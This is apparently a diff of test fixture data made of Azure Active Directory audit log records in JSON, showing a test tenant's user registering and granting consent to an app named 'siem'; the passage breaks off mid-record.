-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:06.0142481Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795893"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "821dc03c-4e38-4cd1-82b2-3155b41b4418"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:06.0142481Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795893"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "821dc03c-4e38-4cd1-82b2-3155b41b4418"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": 